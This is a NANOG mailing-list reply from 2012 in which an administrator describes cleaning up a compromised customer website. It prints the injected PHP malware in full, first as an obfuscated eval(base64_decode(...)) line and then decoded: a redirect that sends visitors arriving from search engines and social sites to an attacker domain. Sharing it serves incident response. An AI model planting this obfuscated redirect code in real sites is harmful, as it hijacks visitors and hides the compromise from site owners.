[154191] in North American Network Operators' Group
Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
daemon@ATHENA.MIT.EDU (Ryan Rawdon)
Wed Jun 27 10:12:39 2012
From: Ryan Rawdon <ryan@u13.net>
In-Reply-To: <20120627132604.GA74019@DataIX.net>
Date: Wed, 27 Jun 2012 10:10:04 -0400
To: Jason Hellenthal <jhellenthal@dataix.net>
Cc: "nanog@nanog.org" <nanog@nanog.org>,
Arturo Servin <arturo.servin@gmail.com>
Errors-To: nanog-bounces+nanog.discuss=bloom-picayune.mit.edu@nanog.org
On Jun 27, 2012, at 9:26 AM, Jason Hellenthal wrote:
>=20
> What would be nice is the to see the contents of the htaccess file
> (obviously with sensitive information excluded)
I cleaned up compromises similar to this in a customer site fairly =
recently. In our case it was the same exact behavior but was php =
injected into their application, instead of .htaccess. I do not recall =
what the original compromise vector was, it was something in the =
customer's custom application which they resolved.
It looked like the malware did a find and replace for <?php and replaced =
it with:
<?php =
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2=
VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVIn=
XTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIC=
hzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBv=
ciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nby=
IpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJh=
cG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlci=
wid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigk=
cmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Ii=
kgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFu=
ZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYX=
RjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJl=
ciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvci=
BzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwi=
Y2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW=
9uOiBodHRwOi8vYnJ1Z2dlLm9zYS5wbC8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0=3D"));
Which decoded yields:
error_reporting(0);
$qazplm=3Dheaders_sent();
if (!$qazplm){
$referer=3D$_SERVER['HTTP_REFERER'];
$uag=3D$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or =
stristr($referer,"rambler") or stristr($referer,"gogo") or =
stristr($referer,"live.com")or stristr($referer,"aport") or =
stristr($referer,"nigma") or stristr($referer,"webalta") or =
stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or =
stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or =
preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=3D/",$referer) or =
preg_match ("/google\.(.*?)\/url/",$referer) or =
stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or =
stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://brugge.osa.pl/");
exit();
}
}
}
}
(where brugge.osa.pl was the destination for the redirects in the =
compromise of this customer site)
>=20
> On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
>>=20
>>> <snip>
>>=20
>=20
> --=20
>=20
> - (2^(N-1))
>=20
